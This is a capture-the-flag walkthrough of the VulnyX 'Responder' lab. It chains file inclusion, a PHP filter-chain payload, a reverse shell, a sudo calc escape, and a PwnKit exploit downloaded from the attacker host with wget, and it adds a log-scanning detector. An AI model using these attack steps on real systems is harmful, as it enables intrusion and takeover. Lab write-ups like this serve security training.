Vlx_Responder

Box source: https://vulnyx.com/

Difficulty: Medium

Mind map: [image]

I. Information Gathering

1. Host discovery

┌──(root㉿kali)-[~/miaosec]
└─# nmap -sn 192.168.2.0/24
Starting Nmap 7.98 ( https://nmap.org ) at 2026-04-02 10:08 +0800
Nmap scan report for 192.168.2.1
Host is up (0.0012s latency).
MAC Address: 0A:00:27:00:00:06 (Unknown)
Nmap scan report for 192.168.2.2
Host is up (0.00068s latency).
MAC Address: 08:00:27:D6:F1:8C (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.14
Host is up (0.0015s latency).
MAC Address: 08:00:27:F9:CF:79 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.4
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 7.65 seconds

Target IP: 192.168.2.14

2. Port scanning

1) Full port scan

┌──(root㉿kali)-[~/miaosec]
└─# nmap --min-rate 10000 -p- 192.168.2.14
Starting Nmap 7.98 ( https://nmap.org ) at 2026-04-02 10:08 +0800
Nmap scan report for 192.168.2.14
Host is up (0.0014s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp filtered ssh
80/tcp open http
MAC Address: 08:00:27:F9:CF:79 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 55.92 seconds

Open port: 80. Port 22 is filtered, presumably blocked by a firewall.

2) Service and version scan

┌──(root㉿kali)-[~/miaosec]
└─# nmap --min-rate 10000 -sT -sC -sV -O -p22,80 192.168.2.14
Starting Nmap 7.98 ( https://nmap.org ) at 2026-04-02 10:09 +0800
Nmap scan report for 192.168.2.14
Host is up (0.00100s latency).

PORT STATE SERVICE VERSION
22/tcp filtered ssh
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: 08:00:27:F9:CF:79 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|router
Running: Linux 4.X|5.X, MikroTik RouterOS 7.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)
Network Distance: 1 hop

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.40 seconds

3) UDP scan

┌──(root㉿kali)-[~/miaosec]
└─# nmap -sU --top-ports 100 192.168.2.14
Starting Nmap 7.98 ( https://nmap.org ) at 2026-04-02 10:09 +0800
Nmap scan report for 192.168.2.14
Host is up (0.0011s latency).
Not shown: 99 closed udp ports (port-unreach)
PORT STATE SERVICE
68/udp open|filtered dhcpc
MAC Address: 08:00:27:F9:CF:79 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 102.91 seconds

II. Web Exploitation

1. Port 80

Visiting port 80 shows the hint "your answer is in the answer.."

┌──(root㉿kali)-[~/miaosec]
└─# curl http://192.168.2.14
your answer is in the answer..

2. Directory enumeration

┌──(root㉿kali)-[~/miaosec]
└─# gobuster dir -u http://192.168.2.14 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,js,txt,bak

index.html (Status: 200) [Size: 31]
filemanager.php (Status: 302) [Size: 0] [--> /]

Found filemanager.php, but it redirects to /; a file inclusion vulnerability is suspected.

3. Fuzzing

Use ffuf to fuzz the parameter name

┌──(root㉿kali)-[~/miaosec]
└─# ffuf -u http://192.168.2.14/filemanager.php?FUZZ=/etc/passwd -w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt -fs 20 -ac

random [Status: 302, Size: 1430, Words: 13, Lines: 28, Duration: 27ms]

Found a parameter named random, but the status code is 302

4. Local File Inclusion (LFI)

Reading /etc/passwd: in a browser the request simply follows the redirect to / and the content is never displayed, so curl is used instead.

┌──(root㉿kali)-[~/miaosec]
└─# curl http://192.168.2.14/filemanager.php?random=/etc/passwd
root:x:0:0:root:/root:/bin/bash
...
elliot:x:1001:1001::/home/elliot:/bin/bash
rohit:x:1002:1002::/home/rohit:/bin/bash

Two users found: elliot and rohit

5. PHP stream wrappers

Use the php://filter wrapper to read the source of filemanager.php

┌──(root㉿kali)-[~/miaosec]
└─# curl http://192.168.2.14/filemanager.php?random=php://filter/read=convert.base64-encode/resource=filemanager.php
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

Base64-decode it

┌──(root㉿kali)-[~/miaosec]
└─# echo "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" | base64 -d
<?php
$filename = $_GET['random'];
include($filename);
header('Location:/');


/*

-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: DES-EDE3-CBC,411124D3C302D4F4

XC2kbWNBYa20zDArT6BMeCgKa9oRs8T5sCVws1wGik8ZWChF4h6N9TzDnDGEMUPG
X+lKp/fDKiZxmJdWu3WhLjgiXNbvX+fLiKZpWBzCAVpwSicS/jjIopzzWjE3PAB7
vRfwdqdiaFK7mQxLJ3o/yrK2CCI8ud2UlEEk8DxTMGklmff8cbhrWIc+by+9AS9t
vKd7hrsoLR6FaxBmfdO4dr1Qn9PZkvohHnMnpI7fdEC2Q3aqu6tFIODcVm6rBaII
QM0CIRdWH/WiW7XmtJUriF55rQRJq4+ShXWtWKBXyJnYvyEduqQhieJ0BA9ZJjzy
myaV1V5l0eKMhxWWBkYaz6bmFsLpbmXBBgIaiozKSKIMGWa1sWCAGv0EmMDRnDG4
ClxkqgnDcgYskrdZLPJ5YN77M9OuB30/VIGXjzskJPp2XaubzYS7BvNjTbiD5uCU
i1fHEzpPI/QeHQ25XlqlGCUla6b8mLFKMM91KcjO6TOSYgArC+kykbuqgDPMc7kt
MKhxrsykmpkNz6FxsF78k/bmstPNbYDsa4ynzlIpiQHms+papIDcsHM4rUDib8Jh
HQMfjbSchpL0YxVXAiz4Nvo33VQxp1WRh0geoO3bYz1D94FvozpeILFexnKaQeT3
GLCLNyZ1BK/p5KKh5F1OhUU0brghzks5NjFYfNoGdnKfRsOIA+6X97AiDjqg9mk4
YfbOgKHl75uELy41WzuNnuynfwWkANz7BhWV/QCLS7NiyaCucXJBJj3LRdT4Ckqf
3F1SNgshDq4vDC4RwkJW2umTmDpW0rZ3syzeb9P4/bmQXkWX/btoIJzmnB6y++Bs
XIrtZKa1yJ6/M0XA6tGTi+bnYD0wOmoU64M3l21HXvQUOXgSg5o0jIJQceTKcIN/
wLLNM0ybmzq7z+MlLGrpyOez/fSAECvagyUZRmnks0eRR1oKzMS00e+qEFJ4GmeE
Yu2dITC6I3pVRZQGcCsZWCX+BP+64Lcdz4/n5lensjab0jd28Kc72sraDteSlP/Y
wWZM9sYbXtcs14cIPpW3a1dbkOT1WGEwjt0X0F0DNgApvA8XnlTr+whJVaMByA4U
t3UQHVUINNoLnX7uSBPo96yWcwAMuXjk8j3ZaFVd5rOGq/Xd0pKBBARd2Un9QZnN
4PzEWF1d9/BObzSeo2dVEZgYXcRE3v0oEZImFIoxQcvgoxxeYjNViX0SsYEJfA9F
Pg8ZQ6R+ZjA3pU1DqBxWnErHDyeGsnVBs8VIQKOiiZMeB12Tx9b9k8E6rjRIw6La
UbzpR+4CVgToD5TZBDpHhWHdPcv3JuNAb49XGdsL889uTwBX+fSTvL6FkXtZjySX
gm6v5x/OPZg4BB/CnCWSeiG+rW0iMU4TGE5LqfuyBZBOhVcDtri3qpYLGH/5NKfw
dq15m9rReh/Jec6Z8BNi9Xo5gEjGglQA/Tfw2VqCmrsMaU3iNMNXLKrYTcsm0qHb
vRYvQl9GgeApdrZ/BY/ySb6OjNUS1Nc9Viv0AM9iCHp4tH6OfmVpnVzDuojdkXiZ
lB/vwbCo9CcBZt7lM91Hl60ZlhLsOa/69PAeC3cZR2Z1svVk1gcDrw==
-----END RSA PRIVATE KEY-----


*/

?>

An encrypted private key is found inside, but since port 22 is filtered, it cannot be used to connect directly from outside.
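As an added defensive example (not part of the original post), the following Python scans web server access logs for the kind of requests seen above: stream wrappers or absolute paths in query values, iconv filter chains, and a redirect from filemanager.php that still carries a body, which is the tell-tale of include() running before header(). The log lines are constructed samples, not a real log from the target.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed Apache combined-log lines modelled on this writeup's requests (sample data, not a real log).
SAMPLE_LOG = """\
192.168.2.4 - - [02/Apr/2026:10:10:01 +0800] "GET / HTTP/1.1" 200 31 "-" "curl/8.5.0"
192.168.2.4 - - [02/Apr/2026:10:10:05 +0800] "GET /filemanager.php?random=/etc/passwd HTTP/1.1" 302 1430 "-" "curl/8.5.0"
192.168.2.4 - - [02/Apr/2026:10:10:09 +0800] "GET /filemanager.php?random=php://filter/read=convert.base64-encode/resource=filemanager.php HTTP/1.1" 302 2212 "-" "curl/8.5.0"
192.168.2.4 - - [02/Apr/2026:10:10:12 +0800] "GET /filemanager.php?random=php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-decode/resource=php://temp HTTP/1.1" 302 512 "-" "curl/8.5.0"
192.168.2.4 - - [02/Apr/2026:10:10:20 +0800] "GET /filemanager.php?random=readme.txt HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
                    r'(?P<status>\d{3}) (?P<size>\d+|-)')
# Stream wrappers that turn include() into a file-read or code-execution primitive.
WRAPPER_RE = re.compile(r'^(php|data|expect|phar|zip|file)://', re.I)


def inspect_request(line):
    """Return the suspicious indicators found in one log line ([] if clean)."""
    m = LOG_RE.match(line)
    if not m:
        return []
    reasons = []
    # parse_qs percent-decodes and splits each pair on the first '=' only, so the
    # inner '=' signs of 'random=php://filter/read=...' are preserved.
    for key, values in parse_qs(urlsplit(m['target']).query, keep_blank_values=True).items():
        for value in values:
            if WRAPPER_RE.match(value):
                reasons.append(f'{key}: stream wrapper in value')
            if 'convert.iconv' in value.lower():
                reasons.append(f'{key}: iconv filter chain (possible code execution)')
            if '../' in value or value.startswith('/'):
                reasons.append(f'{key}: traversal or absolute path')
    size = 0 if m['size'] == '-' else int(m['size'])
    # filemanager.php calls include() before header('Location:/'), so a redirect that
    # still carries a body means the included file was already sent to the client.
    if int(m['status']) in (301, 302, 303, 307, 308) and size > 0:
        reasons.append(f'redirect with {size}-byte body (content leaked before redirect)')
    return reasons


def scan(log_text):
    """Return (client ip, request target, reasons) for every flagged line."""
    alerts = []
    for line in log_text.splitlines():
        reasons = inspect_request(line)
        if reasons:
            m = LOG_RE.match(line)
            alerts.append((m['ip'], m['target'], reasons))
    return alerts
```

The root cause is include() on an unvalidated parameter; the fix is to map the parameter onto an allowlist of local files rather than relying on the redirect, which is sent only after the include has already emitted the file.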

III. RSAcrack

Use RSAcrack to brute-force the passphrase of the encrypted private key

┌──(root㉿kali)-[/tmp]
└─# /root/Tool/RSAcrack -k id_rsa -w /root/Tool/techyou.txt

╭━━━┳━━━┳━━━╮ ╭╮
┃╭━╮┃╭━╮┃╭━╮┃ ┃┃
┃╰━╯┃╰━━┫┃ ┃┣━━┳━┳━━┳━━┫┃╭╮
┃╭╮╭┻━━╮┃╰━╯┃╭━┫╭┫╭╮┃╭━┫╰╯╯
┃┃┃╰┫╰━╯┃╭━╮┃╰━┫┃┃╭╮┃╰━┫╭╮╮
╰╯╰━┻━━━┻╯ ╰┻━━┻╯╰╯╰┻━━┻╯╰╯
─────────────────────────────
code: d4t4s3c ver: v1.0.0
─────────────────────────────
[i] Cracking | id_rsa
[i] Wordlist | /root/Tool/techyou.txt
[*] Status | 3368/20000/16%/elliott
[+] Password | elliott
─────────────────────────────

The passphrase is elliott; the key is probably user elliot's private key.

IV. Getting a Shell

Use a PHP filter chain to get a shell. Tool: synacktiv/php_filter_chain_generator (GitHub)

  1) Generate the payload
┌──(root㉿kali)-[~/Tool]
└─# python3 php_filter_chain_generator.py --chain "<?php system(\$_GET['a']);?>"
....
  2) Run a command to check that it executes. [image] The id output is echoed back successfully.
  3) Run the reverse shell command. [image]
  4) Shell obtained.
┌──(root㉿kali)-[~]
└─# nc -lvnp 4444
listening on [any] 4444 ...
connect to [192.168.2.4] from (UNKNOWN) [192.168.2.14] 43082
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
  5) Stabilize the shell
/usr/bin/script -qc /bin/bash /dev/null
# press Ctrl+Z to suspend it
stty raw -echo; fg
# press Enter
reset xterm
export TERM=xterm
export SHELL=/bin/bash
stty rows 24 columns 80

V. Privilege Escalation

1. Getting elliot's privileges

Log in with the recovered private key. This only works against localhost; logging in via the IP address does not work.

www-data@responder:/tmp$ ssh -i id_rsa elliot@localhost

elliot@responder:~$ id
uid=1001(elliot) gid=1001(elliot) grupos=1001(elliot)

2. Getting rohit's privileges

Check sudo -l

elliot@responder:~$ sudo -l
sudo: unable to resolve host responder: Fallo temporal en la resolución del nombre
Matching Defaults entries for elliot on responder:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User elliot may run the following commands on responder:
(rohit) NOPASSWD: /usr/bin/calc

calc is an interactive program that can very likely execute system commands or read and write files; it supports calling shell commands through system() and exec().

Run a command directly to get rohit's privileges

elliot@responder:~$ sudo -u rohit /usr/bin/calc
sudo: unable to resolve host responder: Fallo temporal en la resolución del nombre
C-style arbitrary precision calculator (version 2.12.7.2)
Calc is open software. For license details type: help copyright
[Type "exit" to exit, or "help" for help.]

; system("id")
uid=1002(rohit) gid=1002(rohit) grupos=1002(rohit)
0
; system("/bin/bash")
rohit@responder:/home/elliot$ id
uid=1002(rohit) gid=1002(rohit) grupos=1002(rohit)

3. Getting root

Look for SUID files

rohit@responder:~$ find / -perm -4000 2>/dev/null
/usr/bin/passwd
/usr/bin/chsh
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/su
/usr/bin/mount
/usr/bin/pkexec
/usr/bin/sudo
/usr/bin/chfn
/usr/bin/umount
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper

/usr/bin/pkexec is present

Check the version

rohit@responder:~$ /usr/bin/pkexec --version
pkexec version 0.105

pkexec version 0.105 is affected by the well-known local privilege escalation vulnerability CVE-2021-4034, commonly called "PwnKit". A version string alone does not prove a host is vulnerable, since distributions backport fixes without changing it, but here the exploit confirms it.

Exploit it directly: CVE-2021-4034

  1) Download the file to the target
rohit@responder:/tmp$ wget http://192.168.2.4/cve-2021-4034-poc.c
--2026-04-02 05:15:43-- http://192.168.2.4/cve-2021-4034-poc.c
Conectando con 192.168.2.4:80... conectado.
Petición HTTP enviada, esperando respuesta... 200 OK
Longitud: 1267 (1,2K) [text/x-csrc]
Grabando a: “cve-2021-4034-poc.c”

cve-2021-4034-poc.c 100%[===================>] 1,24K --.-KB/s en 0s

2026-04-02 05:15:43 (268 MB/s) - “cve-2021-4034-poc.c” guardado [1267/1267]
  2) Compile it
rohit@responder:/tmp$ gcc cve-2021-4034-poc.c -o cve-2021-4034-poc
  3) Run it to get root
rohit@responder:/tmp$ ./cve-2021-4034-poc 
# id
uid=0(root) gid=0(root) groups=0(root),1002(rohit)

VI. Flags

# cat /root/root.txt /home/rohit/user.txt
2dfxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
38exxxxxxxxxxxxxxxxxxxxxxxxxxxxx

Vlx_Responder
http://miao-sec.github.io/Vulnyx/Vlx-Responder/
Author: Miao
Published: April 2, 2026
License: BY-MIAO